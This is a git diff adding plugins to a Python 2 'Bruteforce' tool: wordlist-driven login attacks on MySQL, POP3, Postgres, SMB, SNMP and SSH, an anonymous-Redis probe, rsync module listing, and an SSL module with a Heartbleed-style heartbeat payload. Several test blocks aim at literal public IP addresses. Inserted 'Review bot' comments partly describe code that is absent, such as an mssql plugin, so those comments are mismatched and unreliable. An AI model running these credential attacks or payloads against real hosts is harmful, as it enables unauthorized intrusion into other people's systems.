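Review bot: `flag=mssql_connect(ip,username,password,port)` in `mssq1` calls the method without `self.`, which raises `NameError` on the first iteration, and the surrounding `except Exception,e: pass` hides it, so the plugin silently does nothing—this is the cost of a blanket `pass` handler and should at least log the exception. `run` gates on `if len(ipdict['mysql']):` but iterates `ipdict['mssql']`, so it raises `KeyError` when the scanner found no MySQL service and is gated by the wrong key otherwise; both should use `'mssql'`. The `if flag==2: break` branch is unreachable because `mssql_connect` only ever returns 0 or 1, and `db.close()` runs only on the success path.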
diff --git a/Bruteforce/plugins/mysql.py b/Bruteforce/plugins/mysql.py
new file mode 100644
index 0000000..4388efa
--- /dev/null
+++ b/Bruteforce/plugins/mysql.py
@@ -0,0 +1,80 @@
+#coding=utf-8
+import time
+import threading
+from printers import printPink,printGreen
+from multiprocessing.dummy import Pool
+import MySQLdb
+
+
+class mysql_burp(object):
+ def __init__(self,c):
+ self.config=c
+ self.lock=threading.Lock()
+ self.result=[]
+ self.lines=self.config.file2list("conf/mysql.conf")
+
+ def mysql_connect(self,ip,username,password,port):
+ crack =0
+ try:
+ db=MySQLdb.connect(ip,username,password,port=port)
+ if db:
+ crack=1
+ db.close()
+ except Exception, e:
+ if e[0]==1045:
+ self.lock.acquire()
+ print "%s mysql's %s:%s login fail" %(ip,username,password)
+ self.lock.release()
+ else:
+ self.lock.acquire()
+ print "connect %s mysql service at %s login fail " %(ip,port)
+ self.lock.release()
+ crack=2
+ return crack
+
+ def mysq1(self,ip,port):
+ try:
+ for data in self.lines:
+ username=data.split(':')[0]
+ password=data.split(':')[1]
+ flag=self.mysql_connect(ip,username,password,port)
+ if flag==2:
+ break
+
+ if flag==1:
+ self.lock.acquire()
+ printGreen("%s mysql at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
+ self.result.append("%s mysql at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
+ self.lock.release()
+ break
+ except Exception,e:
+ pass
+
+ def run(self,ipdict,pinglist,threads,file):
+ if len(ipdict['mysql']):
+ printPink("crack mysql now...")
+ print "[*] start crack mysql %s" % time.ctime()
+ starttime=time.time()
+
+ pool=Pool(threads)
+ for ip in ipdict['mysql']:
+ pool.apply_async(func=self.mysq1,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
+
+ pool.close()
+ pool.join()
+
+ print "[*] stop crack mysql %s" % time.ctime()
+ print "[*] crack mysql done,it has Elapsed time:%s " % (time.time()-starttime)
+
+ for i in xrange(len(self.result)):
+ self.config.write_file(contents=self.result[i],file=file)
+
+if __name__ == '__main__':
+ import sys
+ sys.path.append("../")
+ from comm.config import *
+ c=config()
+ ipdict={'mysql': ['127.0.0.1:3306']}
+ pinglist=['127.0.0.1']
+ test=mysql_burp(c)
+ test.run(ipdict,pinglist,50,file="../result/test")
\ No newline at end of file
diff --git a/Bruteforce/plugins/mysql.pyc b/Bruteforce/plugins/mysql.pyc
new file mode 100644
index 0000000..d557ab3
Binary files /dev/null and b/Bruteforce/plugins/mysql.pyc differ
diff --git a/Bruteforce/plugins/ndr.pyc b/Bruteforce/plugins/ndr.pyc
new file mode 100644
index 0000000..5d3e32c
Binary files /dev/null and b/Bruteforce/plugins/ndr.pyc differ
diff --git a/Bruteforce/plugins/pop3.py b/Bruteforce/plugins/pop3.py
new file mode 100644
index 0000000..dab169e
--- /dev/null
+++ b/Bruteforce/plugins/pop3.py
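Review bot: `mysql_connect` returns three distinct codes that `mysq1` branches on, but nothing documents them; add a docstring such as `"""Return 1 on a successful login, 0 when the server rejected the credentials (MySQL error 1045), 2 on any other error so the caller stops iterating this host."""`. The `if db:` test is redundant because `MySQLdb.connect` raises on failure rather than returning a falsy value, and `e[0]==1045` assumes every exception's first argument is an integer, which holds for `MySQLdb.OperationalError` but not for a `socket.timeout`. `pinglist` is accepted by `run` but never used.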
@@ -0,0 +1,61 @@
+#coding=utf-8
+import time
+from printers import printPink,printGreen
+import threading
+from multiprocessing.dummy import Pool
+import poplib
+
+def pop3_Connection(ip,username,password,port):
+ try:
+ pp = poplib.POP3(ip)
+ #pp.set_debuglevel(1)
+ pp.user(username)
+ pp.pass_(password)
+ (mailCount,size) = pp.stat()
+ pp.quit()
+ if mailCount:
+ lock.acquire()
+ printGreen("%s pop3 at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
+ result.append("%s pop3 at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
+ lock.release()
+ except Exception,e:
+ print e
+ lock.acquire()
+ print "%s pop3 service 's %s:%s login fail " %(ip,username,password)
+ lock.release()
+ pass
+
+def pop3_l(ip,port):
+ try:
+ d=open('conf/pop3.conf','r')
+ data=d.readline().strip('\r\n')
+ while(data):
+ username=data.split(':')[0]
+ password=data.split(':')[1]
+ pop3_Connection(ip,username,password,port)
+ data=d.readline().strip('\r\n')
+ except Exception,e:
+ print e
+ pass
+
+def pop_main(ipdict,threads):
+ printPink("crack pop now...")
+ print "[*] start crack pop %s" % time.ctime()
+ starttime=time.time()
+
+ global lock
+ lock = threading.Lock()
+ global result
+ result=[]
+
+ pool=Pool(threads)
+
+ for ip in ipdict['pop3']:
+ pool.apply_async(func=pop3_l,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
+
+ pool.close()
+ pool.join()
+
+ print "[*] stop pop serice %s" % time.ctime()
+ print "[*] crack pop done,it has Elapsed time:%s " % (time.time()-starttime)
+ return result
\ No newline at end of file
diff --git a/Bruteforce/plugins/pop3.pyc b/Bruteforce/plugins/pop3.pyc
new file mode 100644
index 0000000..4c78f08
Binary files /dev/null and b/Bruteforce/plugins/pop3.pyc differ
diff --git a/Bruteforce/plugins/postgres.py b/Bruteforce/plugins/postgres.py
new file mode 100644
index 0000000..b269e62
--- /dev/null
+++ b/Bruteforce/plugins/postgres.py
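Review bot: `d=open('conf/pop3.conf','r')` in `pop3_l` is never closed, so every target handled by a pool thread leaks a file descriptor until the collector runs; `with open('conf/pop3.conf') as d:` fixes it. `lock` and `result` are module globals that only exist after `pop_main` has assigned them, so `pop3_Connection` and `pop3_l` raise `NameError` when called from anywhere else, and this file does not implement the `run(ipdict,pinglist,threads,file)` class interface that `pluginFactory` drives (it is also not registered there), so it is dead code as committed. `port` is only interpolated into the result strings while `poplib.POP3(ip)` is built without it, so reported results are mislabelled whenever the scanner found POP3 on a non-default port. postgres.py repeats the open-without-close and the global `lock`/`result` pattern.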
@@ -0,0 +1,73 @@
+#coding=utf-8
+import time
+import threading
+from printers import printPink,printGreen
+from multiprocessing.dummy import Pool
+import psycopg2
+import re
+
+
+def postgres_connect(ip,username,password,port):
+ crack =0
+ try:
+ db=psycopg2.connect(user=username, password=password, host=ip, port=port)
+ if db:
+ crack=1
+ db.close()
+ except Exception, e:
+ if re.findall(".*Password.*",e[0]):
+ lock.acquire()
+ print "%s postgres's %s:%s login fail" %(ip,username,password)
+ lock.release()
+ crack=2
+ else:
+ lock.acquire()
+ print "connect %s postgres service at %s login fail " %(ip,port)
+ lock.release()
+ crack=3
+ pass
+ return crack
+
+def postgreS(ip,port):
+ try:
+ d=open('conf/postgres.conf','r')
+ data=d.readline().strip('\r\n')
+ while(data):
+ username=data.split(':')[0]
+ password=data.split(':')[1]
+ flag=postgres_connect(ip,username,password,port)
+ time.sleep(0.1)
+ if flag==3:
+ break
+
+ if flag==1:
+ lock.acquire()
+ printGreen("%s postgres at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
+ result.append("%s postgres at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
+ lock.release()
+ break
+ data=d.readline().strip('\r\n')
+ except Exception,e:
+ print e
+ pass
+
+def postgres_main(ipdict,threads):
+ printPink("crack postgres now...")
+ print "[*] start postgres %s" % time.ctime()
+ starttime=time.time()
+
+ global lock
+ lock = threading.Lock()
+ global result
+ result=[]
+
+ pool=Pool(threads)
+
+ for ip in ipdict['postgres']:
+ pool.apply_async(func=postgreS,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
+
+ pool.close()
+ pool.join()
+ print "[*] stop crack postgres %s" % time.ctime()
+ print "[*] crack postgres done,it has Elapsed time:%s " % (time.time()-starttime)
+ return result
\ No newline at end of file
diff --git a/Bruteforce/plugins/postgres.pyc b/Bruteforce/plugins/postgres.pyc
new file mode 100644
index 0000000..b428eee
Binary files /dev/null and b/Bruteforce/plugins/postgres.pyc differ
diff --git a/Bruteforce/plugins/printers.pyc b/Bruteforce/plugins/printers.pyc
new file mode 100644
index 0000000..bbe52c0
Binary files /dev/null and b/Bruteforce/plugins/printers.pyc differ
diff --git a/Bruteforce/plugins/redisexp.py b/Bruteforce/plugins/redisexp.py
new file mode 100644
index 0000000..89a5a45
--- /dev/null
+++ b/Bruteforce/plugins/redisexp.py
@@ -0,0 +1,66 @@
+#coding=utf-8
+import time
+import threading
+from threading import Thread
+from printers import printPink,printGreen
+from Queue import Queue
+import redis
+
+class redis_burp(object):
+
+ def __init__(self,c):
+ self.config=c
+ self.lock=threading.Lock()
+ self.result=[]
+ #self.lines=self.config.file2list("conf/redis.conf")
+ self.sp=Queue()
+
+ def redisexp(self):
+ while True:
+ ip,port=self.sp.get()
+ try:
+ r=redis.Redis(host=ip,port=port,db=0,socket_timeout=8)
+ r.dbsize()
+ self.lock.acquire()
+ printGreen('%s redis service at %s allow login Anonymous login!!\r\n' %(ip,port))
+ self.result.append('%s redis service at %s allow login Anonymous login!!\r\n' %(ip,port))
+ self.lock.release()
+ except Exception,e:
+ pass
+ self.sp.task_done()
+
+
+
+ def run(self,ipdict,pinglist,threads,file):
+ if len(ipdict['redis']):
+ printPink("crack redis now...")
+ print "[*] start crack redis %s" % time.ctime()
+ starttime=time.time()
+
+ for i in xrange(threads):
+ t = Thread(target=self.redisexp)
+ t.setDaemon(True)
+ t.start()
+
+ for ip in ipdict['redis']:
+ self.sp.put((str(ip).split(':')[0],int(str(ip).split(':')[1])))
+
+ self.sp.join()
+
+
+ print "[*] stop redis serice %s" % time.ctime()
+ print "[*] crack redis done,it has Elapsed time:%s " % (time.time()-starttime)
+
+ for i in xrange(len(self.result)):
+ self.config.write_file(contents=self.result[i],file=file)
+
+if __name__ == '__main__':
+ import sys
+ sys.path.append("../")
+ from comm.config import *
+ c=config()
+ ipdict={'redis': ['101.201.177.35:6379']}
+ pinglist=['101.201.177.35']
+ test=redis_burp(c)
+ test.run(ipdict,pinglist,50,file="../result/test")
+
diff --git a/Bruteforce/plugins/redisexp.pyc b/Bruteforce/plugins/redisexp.pyc
new file mode 100644
index 0000000..96f0a60
Binary files /dev/null and b/Bruteforce/plugins/redisexp.pyc differ
diff --git a/Bruteforce/plugins/rsync.py b/Bruteforce/plugins/rsync.py
new file mode 100644
index 0000000..4ce37d4
--- /dev/null
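Review bot: The `redis.Redis(...)` client created in `redisexp` is never released; redis-py parks the socket in the client's connection pool until the object is collected, and because the workers are daemon threads that loop forever on `self.sp.get()`, nothing here bounds how many of those sockets stay open across a large target list. Call `r.connection_pool.disconnect()` in a `finally` next to the existing `self.sp.task_done()`. The worker threads are also re-created on every `run` call and never stopped, so repeated calls keep adding `threads` more consumers on the same queue; `multiprocessing.dummy.Pool` as used by ftp.py would give the same concurrency with cleanup and keep the plugins consistent. `import threading` and `from threading import Thread` duplicate each other, and the commented-out `#self.lines=...` line is dead code.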
+++ b/Bruteforce/plugins/rsync.py 
@@ -0,0 +1,97 @@
+# -*- coding: utf-8 -*-
+import threading
+from printers import printPink,printRed,printGreen
+from multiprocessing.dummy import Pool
+from Queue import Queue
+import re
+import time
+import threading
+from threading import Thread
+from rsynclib import *
+import sys
+import socket
+socket.setdefaulttimeout(10)
+sys.path.append("../")
+
+class rsync_burp(object):
+
+ def __init__(self,c):
+ self.config=c
+ self.lock=threading.Lock()
+ self.result=[]
+ self.sp=Queue()
+
+ def get_ver(self,host):
+ debugging = 0
+ r = rsync(host)
+ r.set_debuglevel(debugging)
+ return r.server_protocol_version
+
+
+ def rsync_connect(self,ip,port):
+ creak=0
+ try:
+ ver=self.get_ver(ip)# get rsync moudle
+ fp = socket.create_connection((ip, port), timeout=8)
+ fp.recv(99)
+
+ fp.sendall(ver.strip('\r\n')+'\n')
+ time.sleep(3)
+ fp.sendall('\n')
+ resp = fp.recv(99)
+
+ modules = []
+ for line in resp.split('\n'):
+ #print line
+ modulename = line[:line.find(' ')]
+ if modulename:
+ if modulename !='@RSYNCD:':
+ self.lock.acquire()
+ printGreen("%s rsync at %s find a module:%s\r\n" %(ip,port,modulename))
+ self.result.append("%s rsync at %s find a module:%s\r\n" %(ip,port,modulename))
+ #print "find %s module in %s at %s" %(modulename,ip,port)
+ self.lock.release()
+ modules.append(modulename)
+
+ except Exception,e:
+ print e
+ pass
+ return creak
+
+
+ def rsync_creak(self,ip,port):
+ try:
+ self.rsync_connect(ip,port)
+ except Exception,e:
+ print e
+
+
+ def run(self,ipdict,pinglist,threads,file):
+ if len(ipdict['rsync']):
+ printPink("crack rsync now...")
+ print "[*] start crack rsync %s" % time.ctime()
+ starttime=time.time()
+
+ pool=Pool(threads)
+
+ for ip in ipdict['rsync']:
+ pool.apply_async(func=self.rsync_creak,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
+ pool.close()
+ pool.join()
+
+ print "[*] stop rsync serice %s" % time.ctime()
+ print "[*] crack rsync done,it has Elapsed time:%s " % (time.time()-starttime)
+
+ for i in xrange(len(self.result)):
+ self.config.write_file(contents=self.result[i],file=file)
+
+
+if __name__ == '__main__':
+ from comm.config import *
+ c=config()
+ ipdict={'rsync': ['103.228.69.151:873']}
+ pinglist=['103.228.69.151']
+ test=rsync_burp(c)
+ test.run(ipdict,pinglist,50,file="../result/test")
+
+
diff --git a/Bruteforce/plugins/rsync.pyc b/Bruteforce/plugins/rsync.pyc
new file mode 100644
index 0000000..4fd4d74
Binary files /dev/null and b/Bruteforce/plugins/rsync.pyc differ
diff --git a/Bruteforce/plugins/rsynclib.py b/Bruteforce/plugins/rsynclib.py
new file mode 100644
index 0000000..816cf67
--- /dev/null
+++ b/Bruteforce/plugins/rsynclib.py
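Review bot: `socket.setdefaulttimeout(10)` runs at import time and changes the default timeout for every socket in the process, including those of the other plugins `pluginFactory` imports before and after this module; keep the timeout local by passing `timeout=` per call, as `socket.create_connection((ip, port), timeout=8)` already does. Two connections are opened per target and neither is closed: the `rsync(host)` object built in `get_ver` connects inside its constructor and has a `close()` that is never called, and `fp` in `rsync_connect` is left open on both the success and the exception path—close both in a `finally`. `creak` is returned but never changes from 0 and `modules` is built but never read, so either the return value should be documented as meaningless or the collected names returned; `import threading` is also listed twice.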
@@ -0,0 +1,194 @@ +import base64 +import re +try: + import hashlib + hash_md4 = hashlib.new("md4") + hash_md5 = hashlib.md5() +except ImportError: + # for Python << 2.5 + import md4 + import md5 + hash_md4 = md4.new() + hash_md5 = md5.new() + +# Import SOCKS module if it exists, else standard socket module socket +try: + import SOCKS; socket = SOCKS; del SOCKS # import SOCKS as socket + from socket import getfqdn; socket.getfqdn = getfqdn; del getfqdn +except ImportError: + import socket +from socket import _GLOBAL_DEFAULT_TIMEOUT + +__all__ = ["rsync"] + + + +# The standard rsync server control port +RSYNC_PORT = 873 +# The sizehint parameter passed to readline() calls +MAXLINE = 8192 +protocol_version = 0 + +# Exception raised when an error or invalid response is received +class Error(Exception): pass + +# All exceptions (hopefully) that may be raised here and that aren't +# (always) programming errors on our side +all_errors = (Error, IOError, EOFError) + + +# Line terminators for rsync +CRLF = '\r\n' +LF = '\n' + +# The class itself +class rsync: + '''An rsync client class. + + To create a connection, call the class using these arguments: + host, module, user, passwd + + All arguments are strings, and have default value ''. + Then use self.connect() with optional host and port argument. + ''' + debugging = 0 + host = '' + port = RSYNC_PORT + maxline = MAXLINE + sock = None + file = None + server_protocol_version = None + + # Initialization method (called by class instantiation). + # Initialize host to localhost, port to standard rsync port + # Optional arguments are host (for connect()), + # and module, user, passwd (for login()) + def __init__(self, host='', module='', user='', passwd='',port=873, + timeout=_GLOBAL_DEFAULT_TIMEOUT): + self.timeout = timeout + if host: + self.connect(host) + if module and user and passwd: + self.login(module, user, passwd) + + def connect(self, host='', port=0, timeout=-999): + '''Connect to host. 
Arguments are: + - host: hostname to connect to (string, default previous host) + - port: port to connect to (integer, default previous port) + ''' + if host != '': + self.host = host + if port > 0: + self.port = port + if timeout != -999: + self.timeout = timeout + self.sock = socket.create_connection((self.host, self.port), self.timeout) + self.af = self.sock.family + self.file = self.sock.makefile('rb') + self.server_protocol_version = self.getresp() + self.protocol_version = self.server_protocol_version[-2:] + return self.server_protocol_version + + + def set_debuglevel(self, level): + '''Set the debugging level. + The required argument level means: + 0: no debugging output (default) + 1: print commands and responses but not body text etc. + ''' + self.debugging = level + debug = set_debuglevel + + # Internal: send one line to the server, appending LF + def putline(self, line): + line = line + LF + if self.debugging > 1: print '*put*', line + self.sock.sendall(line) + + # Internal: return one line from the server, stripping LF. + # Raise EOFError if the connection is closed + def getline(self): + line = self.file.readline(self.maxline + 1) + if len(line) > self.maxline: + raise Error("got more than %d bytes" % self.maxline) + if self.debugging > 1: + print '*get*', line + if not line: raise EOFError + if line[-2:] == CRLF: line = line[:-2] + elif line[-1:] in CRLF: line = line[:-1] + return line + + # Internal: get a response from the server, which may possibly + # consist of multiple lines. Return a single string with no + # trailing CRLF. If the response consists of multiple lines, + # these are separated by '\n' characters in the string + def getmultiline(self): + line = self.getline() + return line + + # Internal: get a response from the server. 
+ # Raise various errors if the response indicates an error + def getresp(self): + resp = self.getmultiline() + if self.debugging: print '*resp*', resp + if resp.find('ERROR') != -1: + raise Error, resp + else: + return resp + + def sendcmd(self, cmd): + '''Send a command and return the response.''' + self.putline(cmd) + return self.getresp() + + def login(self, module='', user = '', passwd = ''): + if not user: user = 'www' + if not passwd: passwd = 'www' + if not module: module = 'www' + + self.putline(self.server_protocol_version) +# self.putline('@RSYNCD: 28.0') +# self.protocol_version = 28 + resp = self.sendcmd(module) + + challenge = resp[resp.find('AUTHREQD ')+9:] + + if self.protocol_version >= 30: + md5=hashlib.md5() + md5.update(passwd) + md5.update(challenge) + hash = base64.b64encode(md5.digest()) + else: + md4=hashlib.new('md4') + tmp = '\0\0\0\0' + passwd + challenge + md4.update(tmp) + hash = base64.b64encode(md4.digest()) + + response, number = re.subn(r'=+$','',hash) + print response + resp = self.sendcmd(user + ' ' + response) + + if resp.find('OK') == -1: + raise Error, resp + return resp + + def getModules(self): + '''Get modules on the server''' + print self.server_protocol_version + self.putline(self.server_protocol_version) + + resp = self.sendcmd('') + print resp + return resp + + + + def close(self): + '''Close the connection without assuming anything about it.''' + self.putline('') + if self.file is not None: + self.file.close() + if self.sock is not None: + self.sock.close() + self.file = self.sock = None + diff --git a/Bruteforce/plugins/rsynclib.pyc b/Bruteforce/plugins/rsynclib.pyc new file mode 100644 index 0000000..e5cd243 Binary files /dev/null and b/Bruteforce/plugins/rsynclib.pyc differ diff --git a/Bruteforce/plugins/rsyncs.pyc b/Bruteforce/plugins/rsyncs.pyc new file mode 100644 index 0000000..11bd951 Binary files /dev/null and b/Bruteforce/plugins/rsyncs.pyc differ 
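Review bot: The module-level fallback `except ImportError:` does not cover the failure this code actually meets today: on interpreters whose OpenSSL has no MD4 (FIPS mode, OpenSSL 3 without the legacy provider) `hashlib.new("md4")` raises `ValueError`, so importing rsynclib—and with it rsync.py and the whole `pluginFactory`—fails at startup. `hash_md4` and `hash_md5` are never used afterwards, so the safest change is to delete the try block entirely and let `login` build its digest when needed. `login` writes the computed authentication response to stdout (`print response`) and `getModules` prints the server banner unconditionally; these debug prints belong behind `if self.debugging:` like the rest of the class. `self.protocol_version = self.server_protocol_version[-2:]` stores a string that `login` later compares with `>= 30`; the intent should be documented since string/int ordering differs between Python versions.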
diff --git a/Bruteforce/plugins/smb.py b/Bruteforce/plugins/smb.py
new file mode 100644
index 0000000..1232474
--- /dev/null
+++ b/Bruteforce/plugins/smb.py
@@ -0,0 +1,72 @@ +#coding=utf-8 +import time +import threading +from printers import printPink,printGreen +from impacket.smbconnection import * +from multiprocessing.dummy import Pool +from threading import Thread + + +class smb_burp(object): + + def __init__(self,c): + self.config=c + self.lock=threading.Lock() + self.result=[] + self.lines=self.config.file2list("conf/smb.conf") + + def smb_connect(self,ip,username,password): + crack =0 + try: + smb = SMBConnection('*SMBSERVER', ip) + smb.login(username,password) + smb.logoff() + crack =1 + except Exception, e: + self.lock.acquire() + print "%s smb 's %s:%s login fail " %(ip,username,password) + self.lock.release() + return crack + + def smb_l(self,ip,port): + try: + for data in self.lines: + username=data.split(':')[0] + password=data.split(':')[1] + if self.smb_connect(ip,username,password)==1: + self.lock.acquire() + printGreen("%s smb at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) + self.result.append("%s smb at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) + self.lock.release() + break + except Exception,e: + pass + + def run(self,ipdict,pinglist,threads,file): + if len(ipdict['smb']): + printPink("crack smb now...") + print "[*] start crack smb serice %s" % time.ctime() + starttime=time.time() + + pool=Pool(threads) + + for ip in ipdict['smb']: + pool.apply_async(func=self.smb_l,args=(str(ip).split(':')[0],int(str(ip).split(':')[1]))) + + pool.close() + pool.join() + + print "[*] stop smb serice %s" % time.ctime() + print "[*] crack smb done,it has Elapsed time:%s " % (time.time()-starttime) + + for i in xrange(len(self.result)): + self.config.write_file(contents=self.result[i],file=file) +if __name__ == '__main__': + import sys + sys.path.append("../") + from comm.config import * + c=config() + ipdict={'smb': ['10.211.55.3:445']} + pinglist=['101.201.177.35'] + test=smb_burp(c) + test.run(ipdict,pinglist,50,file="../result/test") \ No newline at end of 
file diff --git a/Bruteforce/plugins/smb.pyc b/Bruteforce/plugins/smb.pyc new file mode 100644 index 0000000..ba92815 Binary files /dev/null and b/Bruteforce/plugins/smb.pyc differ diff --git a/Bruteforce/plugins/snmp.py b/Bruteforce/plugins/snmp.py new file mode 100644 index 0000000..9405ee3 --- /dev/null +++ b/Bruteforce/plugins/snmp.py @@ -0,0 +1,65 @@ +#coding=utf-8 +import time +import threading +from printers import printPink,printGreen +from multiprocessing.dummy import Pool +from pysnmp.entity.rfc3413.oneliner import cmdgen + + +class snmp_burp(object): + + def __init__(self,c): + self.config=c + self.lock=threading.Lock() + self.result=[] + self.lines=self.config.file2list("conf/snmp.conf") + + def snmp_connect(self,ip,key): + crack =0 + try: + errorIndication, errorStatus, errorIndex, varBinds =\ + cmdgen.CommandGenerator().getCmd( + cmdgen.CommunityData('my-agent',key, 0), + cmdgen.UdpTransportTarget((ip, 161)), + (1,3,6,1,2,1,1,1,0) + ) + if varBinds: + crack=1 + except: + pass + return crack + + def snmp_l(self,ip,port): + try: + for data in self.lines: + flag=self.snmp_connect(ip,key=data) + if flag==1: + self.lock.acquire() + printGreen("%s snmp has weaken password!!-----%s\r\n" %(ip,data)) + self.result.append("%s snmp has weaken password!!-----%s\r\n" %(ip,data)) + self.lock.release() + break + else: + self.lock.acquire() + print "test %s snmp's scan fail" %(ip) + self.lock.release() + except Exception,e: + pass + + def run(self,ipdict,pinglist,threads,file): + printPink("crack snmp now...") + print "[*] start crack snmp %s" % time.ctime() + starttime=time.time() + pool=Pool(threads) + for ip in pinglist: + pool.apply_async(func=self.snmp_l,args=(str(ip).split(':')[0],"")) + + pool.close() + pool.join() + + print "[*] stop crack snmp %s" % time.ctime() + print "[*] crack snmp done,it has Elapsed time:%s " % (time.time()-starttime) + + for i in xrange(len(self.result)): + self.config.write_file(contents=self.result[i],file=file) + 
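Review bot: In `smb_l` the lock is taken with `self.lock.acquire()` and released only on the straight-line path, so if `printGreen` or the `append` raises, the enclosing `except Exception: pass` swallows it and the lock is never released — every other pool worker then blocks forever on its next `acquire()`. Use the context-manager form, `with self.lock:` around the two statements, which releases on any exit; the same acquire/print/release pattern recurs in `smb_connect` here and in the snmp, ssh, vnc, ssltest and web plugins added by this commit. The strings `run` hands to `self.config.write_file` contain cleartext username:password pairs, so the method deserves a docstring stating that the output file is sensitive and should be permission-restricted, and the `result/` directory kept out of the repository (this commit already adds `result/.DS_Store`). The compiled `.pyc` for every plugin is committed alongside its source and should be removed from the change.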
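Review bot: `snmp_l(self, ip, port)` declares a `port` that is never used — `snmp_connect` hard-codes `cmdgen.UdpTransportTarget((ip, 161))` and `run` passes `""` for it — so the signature misleads readers into thinking the port from the scan is honoured; either drop the parameter or thread it through as `cmdgen.UdpTransportTarget((ip, port or 161))` with `run` passing a real value. The bare `except:` in `snmp_connect` also catches `KeyboardInterrupt` and `SystemExit`, which makes the pool hard to stop; narrow it to `except Exception:`. `run` iterates `pinglist` rather than `ipdict` like every other plugin, which is presumably intentional but is worth a one-line comment such as `# probed on every host that answered the ping sweep, not only on open ports`.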
diff --git a/Bruteforce/plugins/snmp.pyc b/Bruteforce/plugins/snmp.pyc new file mode 100644 index 0000000..4e77b89 Binary files /dev/null and b/Bruteforce/plugins/snmp.pyc differ diff --git a/Bruteforce/plugins/ssh.py b/Bruteforce/plugins/ssh.py new file mode 100644 index 0000000..9cce4aa --- /dev/null +++ b/Bruteforce/plugins/ssh.py 
@@ -0,0 +1,84 @@ +#coding=utf-8 +import time +import threading +from multiprocessing.dummy import Pool +from printers import printPink,printGreen +import paramiko + + +class ssh_burp(object): + + def __init__(self,c): + self.config=c + self.lock=threading.Lock() + self.result=[] + self.lines=self.config.file2list("conf/ssh.conf") + + def ssh_connect(self,ip,username,password,port): + crack=0 + try: + client = paramiko.SSHClient() + client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) + client.connect(ip,port,username=username, password=password) + crack=1 + client.close() + except Exception,e: + if e[0]=='Authentication failed.': + self.lock.acquire() + print "%s ssh service 's %s:%s login fail " %(ip,username,password) + self.lock.release() + else: + self.lock.acquire() + print "connect %s ssh service at %s login fail " %(ip,port) + self.lock.release() + crack=2 + return crack + + def ssh_l(self,ip,port): + try: + for data in self.lines: + username=data.split(':')[0] + password=data.split(':')[1] + flag=self.ssh_connect(ip,username,password,port) + if flag==2: + break + if flag==1: + self.lock.acquire() + printGreen("%s ssh at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) + self.result.append("%s ssh at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) + self.lock.release() + break + except Exception,e: + pass + + def run(self,ipdict,pinglist,threads,file): + if len(ipdict['ssh']): + printPink("crack ssh now...") + print "[*] start crack ssh %s" % time.ctime() + starttime=time.time() + + pool=Pool(threads) + + for ip in ipdict['ssh']: + pool.apply_async(func=self.ssh_l,args=(str(ip).split(':')[0],int(str(ip).split(':')[1]))) + + pool.close() + pool.join() + + print "[*] stop ssh serice %s" % time.ctime() + print "[*] crack ssh done,it has Elapsed time:%s " % (time.time()-starttime) + + for i in xrange(len(self.result)): + self.config.write_file(contents=self.result[i],file=file) + + + +if __name__ == 
'__main__': + import sys + sys.path.append("../") + from comm.config import * + c=config() + ipdict={'ssh': ['139.129.30.58:22']} + pinglist=['122.225.81.129'] + test=ssh_burp(c) + test.run(ipdict,pinglist,50,file="../result/test") \ No newline at end of file diff --git a/Bruteforce/plugins/ssh.pyc b/Bruteforce/plugins/ssh.pyc new file mode 100644 index 0000000..1e42932 Binary files /dev/null and b/Bruteforce/plugins/ssh.pyc differ diff --git a/Bruteforce/plugins/ssltest.py b/Bruteforce/plugins/ssltest.py new file mode 100644 index 0000000..207d91d --- /dev/null +++ b/Bruteforce/plugins/ssltest.py 
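Review bot: In `ssh_connect` the `client.close()` sits after `crack=1` inside the `try`, so on every failed attempt — the common case — the `SSHClient` and its transport thread are never closed; with a 50-thread pool walking a wordlist this leaks sockets and threads. Create `client` before the `try` and move the cleanup to `finally:` / `    client.close()` so it runs on every path. `set_missing_host_key_policy(paramiko.AutoAddPolicy())` means the tested credentials are sent to whatever answers at that address with no host-key check, which deserves a comment such as `# NOTE: no known_hosts verification; credentials are disclosed to any host reachable at ip:port`. The `__main__` smoke test also embeds literal public IP addresses; replace them with loopback or a clearly marked placeholder so an accidental run does not touch third-party hosts.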
@@ -0,0 +1,145 @@ +#!/usr/bin/python +import sys +import struct +import socket +import select +import time +import threading +from printers import printPink,printRed +from multiprocessing.dummy import Pool + +class ssl_burp(object): + + def __init__(self,c): + self.config=c + self.lock=threading.Lock() + self.result=[] + + self.hello = self.h2bin(''' + 16 03 02 00 dc 01 00 00 d8 03 02 53 + 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf + bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 + 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 + 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c + c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 + c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 + c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c + c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 + 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 + 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 + 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 + 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 + 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 + 00 0f 00 01 01 + ''') + + self.hb = self.h2bin(''' + 18 03 02 00 03 + 01 40 00 + ''') + + + def h2bin(self,x): + return x.replace(' ', '').replace('\n', '').decode('hex') + + + def recvall(self,s, length, timeout=8): + endtime = time.time() + timeout + rdata = '' + remain = length + while remain > 0: + rtime = endtime - time.time() + if rtime < 0: + return None + r, w, e = select.select([s], [], [], 5) + if s in r: + data = s.recv(remain) + # EOF? 
